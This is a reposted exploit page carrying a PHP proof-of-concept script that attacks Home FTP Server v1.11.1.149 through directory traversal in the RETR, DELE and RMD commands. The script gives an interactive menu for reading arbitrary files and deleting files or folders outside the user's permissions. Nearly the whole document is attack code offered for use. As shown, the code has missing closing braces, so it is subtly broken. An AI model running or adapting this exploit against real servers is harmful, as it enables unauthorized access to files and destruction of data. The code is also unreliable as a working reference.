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Home FTP Server v1.11.1.149 RETR DELE RMD Remote Directory Traversal Exploit
来源:inv0ked.israel@gmail.com 作者:Pr0T3cT10n 发布时间:2010-11-01  

#     _             ____  __            __    ___
#    (_)____ _   __/ __ \/ /_____  ____/ /  _/_/ |
#   / // __ \ | / / / / / //_/ _ \/ __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/  / /_/_/ 
#                   Live by the byte     |_/_/ 
# Members:
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Contact: inv0ked.israel@gmail.com
# -----------------------------------
# The following is a proof of concept exploit for a path traversal vulnerability that exists in Home FTP Server.
# The vulnerability allows an unprivileged attacker to read files and delete files & folders whom he has no permissions to.
# The vulnerable FTP commands are:
# * RETR  - Read File
# * DELE  - Delete File
# * RMD  - Remove Directory
# Exploit Title: Home FTP Server v1.11.1.149 Remote Directory Traversal Exploit
# Date: 31/10/2010
# Author: Pr0T3cT10n
# Software Link: http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe
# Affected Version:
# Tested on Windows XP Hebrew, Service Pack 3

if(count($argv) <= 4) {
 echo("\r\n# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]\r\n");
 echo("\tHOST - An host using Home FTP Server\r\n");
 echo("\tPORT - Default is 21\r\n");
 echo("\tUSER - Username\r\n");
 echo("\tPASS - Password\r\n");
} else {
 $CMD = '';
 $CFG = Array('file' => $argv[0], 'host' => $argv[1], 'port' => $argv[2], 'user' => $argv[3], 'pass' => $argv[4]);
 $sock = fsockopen($CFG['host'], $CFG['port'], $errno, $errstr, 5);
 if($sock) {
  echo("(+) Connected to the FTP server at '{$CFG['host']}' on port {$CFG['port']}\r\n");
  $read = fread($sock, 1024);
  fwrite($sock, "USER {$CFG['user']}\r\n");
  $read = fread($sock, 1024);
  fwrite($sock, "PASS {$CFG['pass']}\r\n");
  $read = fread($sock, 1024);
  echo("(~) What would you like to do?\r\n\t1.Remove File\r\n\t2.Remove Directory\r\n\t3.Read File\r\n");
  $CHSE = rtrim(fgets(STDIN));
  if($CHSE == 1) {
   $CMD.= "DELE";
   echo("(~) Path to file(for example: ../../../test.txt): ");
   $PATH = rtrim(fgets(STDIN));
   if($PATH != '') {
    fwrite($sock, "{$CMD} {$PATH}\r\n");
    echo(fread($sock, 1024));
   } else {
    exit("(-) Empty path.\r\n");
  } elseif($CHSE == 2) {
   $CMD.= "RMD";
   echo("(~) Path to directory(for example: ../../../test): ");
   $PATH = rtrim(fgets(STDIN));
   if($PATH != '') {
    fwrite($sock, "{$CMD} {$PATH}\r\n");
    echo(fread($sock, 1024));
   } else {
    exit("(-) Empty path.\r\n");
  } elseif($CHSE == 3) {
   $CMD.= "RETR";
   echo("(~) Path to file(for example: ../../../test.txt): ");
   $PATH = rtrim(fgets(STDIN));
   if($PATH != '') {
    fwrite($sock, "PASV\r\n");
    $read = fread($sock, 1024);
    $xpld = explode(',', $read);
    $addr_tmp = explode('(', $xpld[0]);
    $address = "{$addr_tmp[1]}.{$xpld[1]}.{$xpld[2]}.{$xpld[3]}";
    $port_tmp = explode(')', $xpld[5]);
    $newport = ($xpld[4]*256)+$port_tmp[0];
    fwrite($sock, "{$CMD} {$PATH}\r\n");
    $read = fread($sock, 1024);
    $socket = fsockopen($address, $newport, $errno, $errstr, 5);
    if($socket) {
     echo(fread($socket, 1024));
   } else {
    exit("(-) Empty path.\r\n");
  } else {
   exit("(-) You have to choose correctly.\r\n");
 } else {
  exit("(-) Unable to connect to {$CFG['host']}:{$CFG['port']}\r\n");

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